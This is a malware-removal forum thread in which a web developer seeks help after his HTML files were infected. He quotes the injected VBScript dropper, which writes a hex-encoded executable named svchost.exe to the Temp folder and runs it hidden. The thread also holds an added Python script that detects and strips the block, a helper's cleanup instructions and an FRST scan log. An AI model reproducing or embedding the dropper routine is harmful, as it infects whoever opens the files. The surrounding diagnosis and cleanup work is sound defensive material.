
All Html files get injected by VBscript svchost


This topic is locked
18 replies to this topic

#1 jsutbee


Posted 31 July 2014 - 04:10 AM

Well, I am seeking help as I am having a very bad week: I'm infected and don't know by what. I think it all happened after I browsed and used a few serial and keygen cracking sites, which I was using to crack a few data recovery programs, and I suddenly felt that I was infected after using them. After checking my files and system, I found that all my HTML files got injected by a script like

 

<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"

WriteData = "4D5A90000300000004000000FFFF0000B8000000000000004000000000000000000000000000000000000000000000000000000000000000000000008800000009DAF5C5C824EA25F0055C7EB55610FA4A9327840AEBC01BDC2284CB0C4F05B1 ............................................................................................................................................................................................................................................................................................................

...

and at the end of the file
 

Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT><!--®JIô=_Q­N¯¨H6vlÕ¬^Bíx9e±f›ànþvѸgU=§¡,«A˜$­˜pÜpÊ.mõ•µ@`ºOT&Fú!%ãL|‹¼-{qöúÓ"©€A5sµ¼&ïòð;7cìAoOj@•²¾äî¤M[÷/Øg€ã«¥¤ü¾'vÞ¦XÑÆ™Kõ¿€÷û’´‘(‚x)r!x49²0€¤øщ†rÔ7bŠ¦]VåÓÍà¢7¦ƒæ_ò&½nà«yq艛œî2:l†7u|Ѐ¡HO~€}a¶tÕb}¼õë9lJ¬°a=x}õìPëÚÎÆÂT›úØORýF?±HMcÉ¡iñ‚ ZYK‹|§|lªyø9̇÷´6Àjš.e9’˜‘Ûj¿ÒR ±ÖFPC
 
with strange encoding appended.

Well, I'm a web developer and have lots of HTML files on my local WAMP server. All PHP files seem OK.
I'm seeking help @bleepingcomputer.
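As an added example (not the poster's own code, nor from any tool mentioned in the thread), here is a small Python checker a web developer could run over a local web root to list the HTML files carrying the dropper block shown above and strip it again, keeping a backup of each file. The sample documents and file names are constructed; the drop name and the first 20 bytes of hex come from the block quoted in the post.

```python
# Added example (not from the post or any tool it names): find and strip the
# VBScript dropper block that the post shows appended to HTML files.
import re
import tempfile
from pathlib import Path

# Markers taken from the injected block quoted in the post.
START_RE = re.compile(r'<SCRIPT\s+Language=VBScript>\s*<!--', re.IGNORECASE)
END_MARK = '//--></SCRIPT>'
NAME_RE = re.compile(r'DropFileName\s*=\s*"([^"]+)"', re.IGNORECASE)
DATA_RE = re.compile(r'WriteData\s*=\s*"([0-9A-Fa-f]*)', re.IGNORECASE)


def find_injection(html):
    """Return details of the injected block, or None when the document is clean."""
    m = START_RE.search(html)
    if not m:
        return None
    block = html[m.start():]
    name = NAME_RE.search(block)
    data = DATA_RE.search(block)
    hex_payload = data.group(1) if data else ''
    return {
        'offset': m.start(),
        'drop_name': name.group(1) if name else None,   # written to the Temp folder
        'payload_bytes': len(hex_payload) // 2,          # two hex digits per byte
        'payload_is_pe': hex_payload[:4].upper() == '4D5A',  # 'MZ' DOS header
        'runs_dropped_file': 'WSHshell.Run' in block,
    }


def strip_injection(html):
    """Return (cleaned_html, removed).

    The infector appends its script after the real document and follows it with an
    unterminated '<!--' plus raw bytes (the 'strange encoding' in the post); that
    trailer is dropped together with the script element.
    """
    m = START_RE.search(html)
    if not m:
        return html, False
    head = html[:m.start()]
    end = html.find(END_MARK, m.end())
    if end == -1:                    # no terminator: treat the rest as injected
        return head, True
    tail = html[end + len(END_MARK):]
    if tail.startswith('<!--') and '-->' not in tail:
        tail = ''
    return head + tail, True


def scan_tree(root):
    """Walk root for .htm/.html files; return {path: info} for the infected ones."""
    hits = {}
    for path in sorted(Path(root).rglob('*')):
        if path.is_file() and path.suffix.lower() in ('.htm', '.html'):
            # latin-1 maps every byte 1:1, so the appended raw bytes cannot break decoding
            info = find_injection(path.read_bytes().decode('latin-1'))
            if info:
                hits[str(path)] = info
    return hits


def clean_tree(root):
    """Strip the block from each infected file under root (keeping a .bak copy); return paths cleaned."""
    cleaned = []
    for path_str in scan_tree(root):
        path = Path(path_str)
        raw = path.read_bytes()
        fixed, removed = strip_injection(raw.decode('latin-1'))
        if removed:
            Path(path_str + '.bak').write_bytes(raw)
            path.write_bytes(fixed.encode('latin-1'))
            cleaned.append(path_str)
    return cleaned


# Constructed sample documents; the hex is the first 20 bytes quoted in the post.
SAMPLE_CLEAN = '<html><body><p>hello</p></body></html>\n'
SAMPLE_INFECTED = (
    SAMPLE_CLEAN
    + '<SCRIPT Language=VBScript><!--\n'
    + 'DropFileName = "svchost.exe"\n'
    + 'WriteData = "4D5A90000300000004000000FFFF0000B8000000"\n'
    + 'Set FSO = CreateObject("Scripting.FileSystemObject")\n'
    + 'DropPath = FSO.GetSpecialFolder(2) & "\\" & DropFileName\n'
    + 'Set WSHshell = CreateObject("WScript.Shell")\n'
    + 'WSHshell.Run DropPath, 0\n'
    + '//--></SCRIPT><!--\x8eJ\xf4=_Q\xadN\xaf'
)

if __name__ == '__main__':
    with tempfile.TemporaryDirectory() as root:
        (Path(root) / 'index.html').write_bytes(SAMPLE_INFECTED.encode('latin-1'))
        (Path(root) / 'about.htm').write_bytes(SAMPLE_CLEAN.encode('latin-1'))
        for path, info in scan_tree(root).items():
            print(path, info)
        print('cleaned:', clean_tree(root))
        print('still infected:', scan_tree(root))
```

Cleaning the files only removes the injected HTML block; the dropped executable in the Temp folder and whatever it installed still have to be dealt with separately, which is what the rest of the thread is about.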

 

 



#2 jsutbee


Posted 31 July 2014 - 11:25 PM

Sorry to bother you all again.
The injected script by the svchost VBScript above is now cleared after using AVG antivirus. But my PC is having strange issues.
Previously I was unable to ping from cmd, but now that's solved too; I can ping. But my other apps are now corrupted, I think. I can't run MongoDB, MySQL, Python and other apps from the command prompt which I previously used, for which there is already a path defined in the system environment variables.
Hope someone here can give me a way out of this. I just don't want to format my PC.



#3 xXToffeeXx

  • Malware Response Instructor

Posted 02 August 2014 - 01:56 PM

Greetings and :welcome: to BleepingComputer,
My name is xXToffeeXx, but feel free to call me Toffee if it is easier for you. I will be helping you with your malware problems.
 
A few points to cover before we start:

  • Do not run any tools without being instructed to as this makes my job much harder in trying to figure out what you have done.
  • Make sure to read my instructions fully before attempting a step.
  • If you have problems or questions with any of the steps, feel free to ask me. I will be happy to answer any questions you have.
  • Please follow the topic by clicking on the "Follow this topic" button, and make sure a tick is in the "receive notifications" and is set to "Instantly". Any replies should be made in this topic by clicking the "Reply to this topic" button.
  • Important information in my posts will often be in bold, make sure to take note of these.
  • I will attempt to reply as soon as possible, and normally within 24 hours of your reply. If this is not possible or I have a delay then I will let you know.
  • I will bump a topic after 3 days of no activity, and then will give you another 2 days to reply before a topic is closed. If you need more time than this please let me know.
  • Let's get going now :thumbup2:

==========================
 
Hi jsutbee,

 

If this is what I believe it is, then I may have bad news for you; let's see this log first, though.
 
Please download Farbar Recovery Scan Tool and save it to your Desktop.
 
Note: You need to run the version compatible with your system. If you are not sure which version applies to your system, download both of them and try to run them. Only one of them will run on your system, that will be the right version.

  • Right-click FRST then click "Run as administrator" (XP users: click run after receipt of Windows Security Warning - Open File).
  • When the tool opens, click Yes to disclaimer.
  • Press the Scan button.
  • When finished, it will produce a log called FRST.txt in the same directory the tool was run from.
  • Please copy and paste the log in your next reply.

Note 2: The first time the tool is run it generates another log (Addition.txt - also located in the same directory the tool was run from). Please also paste that, along with the FRST.txt into your next reply.
 
--------------
 
To recap, in your next reply I would like to see the following. Make sure to copy & paste them unless I ask otherwise:

  • FRST.txt
  • Addition.txt

xXToffeeXx~




#4 jsutbee


Posted 04 August 2014 - 03:43 AM

Hi Toffee, hope you are having a great day :)

Thanks for your response. Well, I previously installed the AVG antivirus before getting any reply from here. I scanned the whole PC and recovered my HTML files too, as I previously mentioned, and AVG still detects a few viruses to remove and is doing its job.

Well, as per your suggestion I downloaded FRST and scanned my system. The scan gets stuck after "Getting office sessions errors: 5371" and no further scan continues. I tried several times but with no luck scanning completely.
The scan results of FRST.txt and Addition.txt are as follows:

FRST.TXT
-----------------------

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version:2-08-2014
Ran by User (administrator) on BIKASH on 04-08-2014 13:50:18
Running from E:\Myfiles and backup\svchost remover
Platform: Microsoft Windows 7 Ultimate  (X86) OS Language: English (United States)
Internet Explorer Version 9
Boot Mode: Normal
 
The only official download link for FRST:
Download link from any site other than Bleeping Computer is unpermitted or outdated.
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2014\avgrsx.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2014\avgcsrvx.exe
(Microsoft Corporation) C:\Windows\System32\audiodg.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2014\avgidsagent.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2014\avgwdsvc.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Microsoft Corporation) C:\Program Files\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
(Microsoft Corporation) C:\Program Files\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
(Microsoft Corporation) C:\Windows\System32\inetsrv\inetinfo.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
(PostgreSQL Global Development Group) C:\Program Files\PostgreSQL\9.2\bin\pg_ctl.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(TeamViewer GmbH) C:\Program Files\TeamViewer\Version9\TeamViewer_Service.exe
(PostgreSQL Global Development Group) C:\Program Files\PostgreSQL\9.2\bin\postgres.exe
(Apache Software Foundation) C:\Program Files\VisualSVN Server\bin\VisualSVNServer.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe
(AVG Secure Search) C:\Program Files\Common Files\AVG Secure Search\vToolbarUpdater\3.1.0\ToolbarUpdater.exe
(PostgreSQL Global Development Group) C:\Program Files\PostgreSQL\9.2\bin\postgres.exe
(Apache Software Foundation) D:\wamp\bin\apache\Apache2.2.17\bin\httpd.exe
() C:\Program Files\Common Files\AVG Secure Search\vToolbarUpdater\3.1.0\loggingserver.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Google) C:\Program Files\Google\Google Talk\googletalk.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2014\avgui.exe
() C:\Program Files\AVG Web TuneUp\vprot.exe
(Microsoft Corporation) C:\Program Files\Windows Sidebar\sidebar.exe
(FreeDownloadManager.ORG) C:\Program Files\Free Download Manager\fdm.exe
(WordWeb Software) C:\Program Files\WordWeb\wweb32.exe
() C:\Program Files\ownCloud\owncloud.exe
(Microsoft Corporation) C:\Windows\System32\StikyNot.exe
(McAfee, Inc.) C:\Program Files\McAfee Security Scan\3.8.150\SSScheduler.exe
(TechSmith Corporation) C:\Program Files\TechSmith\Snagit 11\Snagit32.exe
(Dropbox, Inc.) C:\Users\User\AppData\Roaming\Dropbox\bin\Dropbox.exe
(Evernote Corp., 305 Walnut Street, Redwood City, CA 94063) C:\Program Files\Evernote\Evernote\EvernoteClipper.exe
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(http://tortoisesvn.net) C:\Program Files\TortoiseSVN\bin\TSVNCache.exe
(Apache Software Foundation) C:\Program Files\VisualSVN Server\bin\VisualSVNServer.exe
(PostgreSQL Global Development Group) C:\Program Files\PostgreSQL\9.2\bin\postgres.exe
(PostgreSQL Global Development Group) C:\Program Files\PostgreSQL\9.2\bin\postgres.exe
(PostgreSQL Global Development Group) C:\Program Files\PostgreSQL\9.2\bin\postgres.exe
(PostgreSQL Global Development Group) C:\Program Files\PostgreSQL\9.2\bin\postgres.exe
(PostgreSQL Global Development Group) C:\Program Files\PostgreSQL\9.2\bin\postgres.exe
() D:\wamp\bin\mysql\mysql5.5.8\bin\mysqld.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2014\avgnsx.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2014\avgemcx.exe
(TechSmith Corporation) C:\Program Files\TechSmith\Snagit 11\TscHelp.exe
(TechSmith Corporation) C:\Program Files\TechSmith\Snagit 11\SnagPriv.exe
(TechSmith Corporation) C:\Program Files\TechSmith\Snagit 11\SnagitEditor.exe
(Apache Software Foundation) D:\wamp\bin\apache\Apache2.2.17\bin\httpd.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\Binn\fdlauncher.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\Binn\fdhost.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKU\S-1-5-21-3613995967-3578341659-1565537388-1000\...\Run: [Free Download Manager] => C:\Program Files\Free Download Manager\fdm.exe [6875136 2014-07-30] (FreeDownloadManager.ORG)
HKU\S-1-5-21-3613995967-3578341659-1565537388-1000\...\Run: [WordWeb] => C:\Program Files\WordWeb\wweb32.exe [77056 2013-05-16] (WordWeb Software)
HKU\S-1-5-21-3613995967-3578341659-1565537388-1000\...\Run: [Skype] => C:\Program Files\Skype\Phone\Skype.exe [21445248 2014-05-08] (Skype Technologies S.A.)
HKU\S-1-5-21-3613995967-3578341659-1565537388-1000\...\Run: [ownCloud] => C:\Program Files\ownCloud\owncloud.exe [17381826 2014-06-26] ()
HKU\S-1-5-21-3613995967-3578341659-1565537388-1000\...\Run: [RESTART_STICKY_NOTES] => C:\Windows\System32\StikyNot.exe [354304 2009-07-14] (Microsoft Corporation)
HKU\S-1-5-21-3613995967-3578341659-1565537388-1000\...\MountPoints2: {f80c5e7a-954b-11e0-9744-6c626dc4e396} - G:\setup.exe
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\McAfee Security Scan Plus.lnk
ShortcutTarget: McAfee Security Scan Plus.lnk -> C:\Program Files\McAfee Security Scan\3.8.150\SSScheduler.exe (McAfee, Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Snagit 11.lnk
ShortcutTarget: Snagit 11.lnk -> C:\Program Files\TechSmith\Snagit 11\Snagit32.exe (TechSmith Corporation)
Startup: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk
ShortcutTarget: Dropbox.lnk -> C:\Users\User\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
Startup: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EvernoteClipper.lnk
ShortcutTarget: EvernoteClipper.lnk -> C:\Program Files\Evernote\Evernote\EvernoteClipper.exe (Evernote Corp., 305 Walnut Street, Redwood City, CA 94063)
Startup: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)
ShellIconOverlayIdentifiers: "DropboxExt1" -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
ShellIconOverlayIdentifiers: "DropboxExt2" -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
ShellIconOverlayIdentifiers: "DropboxExt3" -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
ShellIconOverlayIdentifiers: "DropboxExt4" -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
ShellIconOverlayIdentifiers: "DropboxExt5" -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
ShellIconOverlayIdentifiers: "DropboxExt6" -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
ShellIconOverlayIdentifiers: "DropboxExt7" -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
ShellIconOverlayIdentifiers: "DropboxExt8" -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
ShellIconOverlayIdentifiers: 00avast -> {472083B0-C522-11CF-8763-00608CC02F24} =>  No File
ShellIconOverlayIdentifiers: 1TortoiseNormal -> {C5994560-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll (http://tortoisesvn.net)
ShellIconOverlayIdentifiers: 2TortoiseModified -> {C5994561-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll (http://tortoisesvn.net)
ShellIconOverlayIdentifiers: 3TortoiseConflict -> {C5994562-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll (http://tortoisesvn.net)
ShellIconOverlayIdentifiers: 4TortoiseLocked -> {C5994563-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll (http://tortoisesvn.net)
ShellIconOverlayIdentifiers: 5TortoiseReadOnly -> {C5994564-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll (http://tortoisesvn.net)
ShellIconOverlayIdentifiers: 6TortoiseDeleted -> {C5994565-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll (http://tortoisesvn.net)
ShellIconOverlayIdentifiers: 7TortoiseAdded -> {C5994566-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll (http://tortoisesvn.net)
ShellIconOverlayIdentifiers: 8TortoiseIgnored -> {C5994567-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll (http://tortoisesvn.net)
ShellIconOverlayIdentifiers: 9TortoiseUnversioned -> {C5994568-53D9-4125-87C9-F193FC689CB2} => C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll (http://tortoisesvn.net)
GroupPolicy: Group Policy on Chrome detected <======= ATTENTION
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
ProxyServer: 133.242.131.152:443
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/?pc=UP97&ocid=UP97DHP
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/?ocid=iehp
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0x1908234753B3CC01
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-US
SearchScopes: HKCU - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKCU - {3AD893BD-313B-4CD7-9292-87769616B9E8} URL = http://search.yahoo.com/search?fr=chr-greentree_ie&ei=utf-8&ilc=12&type=937811&p={searchTerms}
SearchScopes: HKCU - {BDFEF54B-1D63-415B-B63E-F96B4F95223A} URL = http://search.aol.com/aol/search?s_it=tb50winamp&q={searchTerms}
BHO: Media Watch -> {01d7c86a-b746-4647-afed-d88f7528f044} -> C:\Program Files\MediaWatchV1\MediaWatchV1home1288\ie\MediaWatchV1home1288.dll No File
BHO: MSS+ Identifier -> {0E8A89AD-95D7-40EB-8D9D-083EF7066A01} -> C:\Program Files\McAfee Security Scan\3.8.150\McAfeeMSS_IE.dll (McAfee, Inc.)
BHO: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO: Media Viewer -> {6edc79e0-4d6f-4de7-be61-f8e9bc80fd50} -> C:\Program Files\MediaViewerV1\MediaViewerV1alpha442\ie\MediaViewerV1alpha442.dll No File
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office12\GrooveShellExtensions.dll (Microsoft Corporation)
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO: Microsoft Web Test Recorder 10.0 Helper -> {876d9f09-c6d6-4324-a2cc-04dd9a4de12f} -> C:\Program Files\Microsoft Visual Studio 11.0\Common7\IDE\PrivateAssemblies\Microsoft.VisualStudio.QualityTools.RecorderBarBHO100.dll (Microsoft Corporation)
BHO: Evernote extension -> {92EF2EAD-A7CE-4424-B0DB-499CF856608E} -> C:\Program Files\Evernote\Evernote\EvernoteIE.dll (Evernote Corp., 305 Walnut Street, Redwood City, CA 94063)
BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
BHO: Media Buzz -> {d0c64ff5-c2d4-4f66-9fa3-69d4846db615} -> C:\Program Files\MediaBuzzV1\MediaBuzzV1mode6898\ie\MediaBuzzV1mode6898.dll No File
BHO: Media View -> {d6f31e2c-0a30-4b60-a44c-141aa27478d4} -> C:\Program Files\MediaViewV1\MediaViewV1alpha678\ie\MediaViewV1alpha678.dll No File
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
BHO: Media Player -> {df68ab54-afc1-4005-aa2f-6a6ae5d2dea0} -> C:\Program Files\MediaPlayerV1\MediaPlayerV1alpha583\ie\MediaPlayerV1alpha583.dll No File
BHO: Zip Enhancer -> {E4935D75-87EE-40C6-B430-7434FB685DEC} -> C:\Program Files\AmiExt\ZipEnhancer\ie\AmiBho.dll No File
BHO: Rich Media View -> {f9aaacf6-0ca0-4ff4-8f71-d935d2eb86fd} -> C:\Program Files\RichMediaViewV1\RichMediaViewV1release335\ie\RichMediaViewV1release335.dll No File
Toolbar: HKLM - No Name - !{687578b9-7132-4a7a-80e4-30ee31099e03} -  No File
Toolbar: HKLM - No Name - !{F3FEE66E-E034-436a-86E4-9690573BEE8A} -  No File
Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files\Microsoft Office\Office12\GrooveSystemServices.dll (Microsoft Corporation)
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files\Common Files\Skype\Skype4COM.dll (Skype Technologies)
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
Handler: viprotocol - {B658800C-F66E-4EF3-AB85-6C0C227862A9} - C:\Program Files\Common Files\AVG Secure Search\ViProtocolInstaller\3.1.0\ViProtocol.dll (AVG Secure Search)
Winsock: Catalog5 07 C:\Program Files\Bonjour\mdnsNSP.dll [121704] (Apple Inc.)
Tcpip\..\Interfaces\{63FC3279-79DA-467C-9214-685FFAC4C36B}: [NameServer]192.168.1.1
Tcpip\..\Interfaces\{DD3FC8E9-6A2B-4F35-A1CF-48A32145169C}: [NameServer]192.168.1.1
 
FireFox:
========
FF ProfilePath: C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default
FF SearchEngineOrder.3: Bing 
FF NetworkProxy: "http", "125.195.133.102"
FF NetworkProxy: "http_port", 808
FF NetworkProxy: "type", 0
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32_14_0_0_145.dll ()
FF Plugin: @Apple.com/iTunes,version=1.0 -> C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin: @avg.com/AVG SiteSafety plugin,version=11.0.0.1,application/x-avg-sitesafety-plugin -> C:\Program Files\Common Files\AVG Secure Search\SiteSafetyInstaller\3.1.0\\npsitesafety.dll No File
FF Plugin: @java.com/DTPlugin,version=10.5.0 -> C:\Windows\system32\npDeployJava1.dll (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.5.0 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin: @messenger.yahoo.com/YahooMessengerStatePlugin;version=1.0.0.6 -> C:\Program Files\Yahoo!\Shared\npYState.dll (Yahoo! Inc.)
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.10411.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @nullsoft.com/winampDetector;version=1 -> C:\Program Files\Winamp Detect\npwachk.dll (Nullsoft, Inc.)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\NPOFF12.DLL (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nppdf32.dll (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin2.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin3.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin4.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin5.dll (Apple Inc.)
FF SearchPlugin: C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\searchplugins\aol-search.xml
FF Extension: No Name - C:\Users\User\AppData\Roaming\Mozilla\Firefox\profiles\extensions\extensions [2014-07-25]
FF Extension: SavePass - C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\Extensions\RNEOMVW50611856@ZKVKQ22976610.com [2014-07-25]
FF Extension: Screen Capture Elite - C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\Extensions\screencaptureelite@plugin [2012-06-14]
FF Extension: No Name - C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\Extensions\staged [2014-08-01]
FF Extension: FireShot - C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\Extensions\{0b457cAA-602d-484a-8fe7-c1d894a011ba} [2014-06-11]
FF Extension: Firebug - C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\Extensions\firebug@software.joehewitt.com.xpi [2012-05-30]
FF Extension: FlashGot - C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\Extensions\{19503e42-ca3c-4c27-b1e2-9cdb2170ee34}.xpi [2013-10-03]
FF Extension: MeasureIt - C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\Extensions\{75CEEE46-9B64-46f8-94BF-54012DE155F0}.xpi [2014-03-04]
FF Extension: FireMobileSimulator - C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\Extensions\{77cc852e-6b45-11dd-929f-d30256d89593}.xpi [2013-03-05]
FF Extension: FireFTP - C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\Extensions\{a7c6cf7f-112c-4500-a7ea-39801a327e5f}.xpi [2014-07-14]
FF Extension: Modify Headers - C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\Extensions\{b749fc7c-e949-447f-926c-3f4eed6accfe}.xpi [2014-01-21]
FF Extension: User Agent Switcher - C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\Extensions\{e968fc70-8f95-4ab9-9e79-304de2a71ee1}.xpi [2014-01-21]
